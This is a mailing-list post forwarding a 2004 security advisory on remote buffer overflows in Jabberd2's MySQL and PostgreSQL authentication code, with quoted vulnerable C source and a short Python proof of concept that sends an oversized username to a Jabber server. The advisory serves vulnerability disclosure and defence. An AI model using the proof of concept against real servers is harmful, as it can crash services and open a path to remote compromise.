[jadmin] Jabberd2 remote vulns

icbm icbm at venustech.com.cn
Mon Nov 22 01:54:09 CST 2004 

Hi guys:

       I found something funny in the jabber2s2 and jabberd2s3 but maybe 
effect the s4,  more details in the attachment.

Zhaowei

-- 
------------------------------------------------------------------------                                                   
Company:                                            www.venustech.com.cn
SST:                                                       www.0x557.org
My blog:                                             blog.0x557.org/icbm
------------------------------------------------------------------------
My GPG-Key:            gpg --keyserver pgp.mit.edu --recv-key 0xFCC66634
Key Fingerprint:      84C2 A55A F5A5 34A0 16B3  3691 8473 A1AF FCC6 6634
------------------------------------------------------------------------

-------------- next part --------------
				[Security Advisory]
				
				
Advisory: [AD_LAB-04002]Jabberd2.x remote Buffer Overflows
Authors: icbm at venustech.com.cn
Class: Boundary Condition Error
Remote: Yes, could allow remote compromise

Vulnerable: Jabberd 2
Unvulnerable: Jabberd 1.4
Vendor: http://jabberd.jabberstudio.org/ 

I.INFO: 
-------

Jabber 2 server (Jabberd), the latest release of the popular open source messaging system based 
on the Jabber Protocol. It has been rewritten from the ground up to be scalable, architecturally 
sound, and to support the latest protocol extensions coming out of the JSF. The goal of Jabber
is to provide an XML protocol for synchronous and asynchronous communication for client to 
client, client to server, and server to server messaging, although the primary use of Jabber 
is instant messaging (IM).

The C2S (Client to Server) component handles communication with Jabber clients:
1.Connects to Jabber clients
2.Passes packets to the SM
3.Authenticates clients
4.Registers users
5.Triggers activity with the SM
The C2S component connects to the Authentication Data Package (authreg) in order to register 
and authenticate users.

II.DESCRIPTION: 
---------------

There is a remote buffer overflow in the C2S module of Jabberd2.x which allows attackers to 
crash the Jabberd sever or even run an arbitrary code on it.

The nature of this vulnerability lies in the fact that an attacker can bypass the length check 
of a username and the password and supply a very long username to the server which directly handles 
the long username with the database relate function like mysql_real_escape_string, PQescapeString 
etc. and then cause a remote buffer overflow.


III.DETAILS:
------------

In the Authreg.c(c2s) file the jabberd server cuts the length of the username with this:

    snprintf(username, 1024, "%.*s", NAD_CDATA_L(nad, elem), NAD_CDATA(nad, elem));

So we believe the max length of the username is 1024, so the fist problem is in the 
authreg_mysql.c

static MYSQL_RES *_ar_mysql_get_user_tuple(authreg_t ar, char *username, char *realm) {
    mysqlcontext_t ctx = (mysqlcontext_t) ar->private;
    MYSQL *conn = ctx->conn;
    char euser[513], erealm[513], sql[2049]; //euser and erealm only 513 long
    MYSQL_RES *res;
    
    if(mysql_ping(conn) != 0) {
        log_write(ar->c2s->log, LOG_ERR, "mysql: connection to database lost");
        return NULL;
    }

    mysql_real_escape_string(conn, euser, username, strlen(username));//Thers is the buffer overflow
    mysql_real_escape_string(conn, erealm, realm, strlen(realm));//and there also has one.

As the user should be (strlen(username)*2)+1 long so if the username or realm is longer than
256 bytes there will be a buffer overflow. But when we patched the hole by increasing the user 
and realm to 2049 bytes(1024*2+1) there still was a buffer overflow.

This data flow is:

_sx_sasl_scod_callback(sasl.c:501)
	|
	|----->_c2s_sx_sasl_callback(main.c:264)
		|
		|----->_ar_mysql_get_password(authreg_mysql.c:92)
			|
			|----->_ar_mysql_get_user_tuple(authreg_mysql.c:42)

So we find the essence of this problem: in the _c2s_sx_sasl_callback(c2s/main.c) the sever directly 
calls the database related function to handle the username here without any length check.

BTW:In the file authreg_pgsql.c have the same problems, the code is below:

    char euser[513], erealm[513], sql[2049];    /* query(1024) + euser(512) + erealm(512) + \0(1) */
    PGresult *res;

    PQescapeString(euser, username, strlen(username));
    PQescapeString(erealm, realm, strlen(realm));

IV.POC: 
-------

Just a POC:)
#!/usr/bin/python
import xmpp
name = 'a'*10240
# Born a client
cl=xmpp.Client('localhost')
if not cl.connect(server=('192.168.10.138',5222)):
    raise IOError('Can not connect to server.')
if not cl.auth(name,'jabberuserpassword','optional resource name'):
    raise IOError('Can not auth with server.')
cl.disconnect()

V.CREDIT: 
---------
Thanks rob at cataclysm.cx help me on this:)
Sam, Air, Flashsky, S0f, Cjj and all Venustech AD-Lab guys...

VI.DISCLAIMS:
-------------

The information in this bulletin is provided "AS IS" without warranty of any
kind. In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special damages. 

Copyright 1996-2004 VENUSTECH. All Rights Reserved. Terms of use.

VENUSTECH Security Lab 
VENUSTECH INFORMATION TECHNOLOGY CO.,LTD(http://www.venustech.com.cn)

              Security
Trusted  {Solution} Provider
              Service

More information about the jadmin mailing list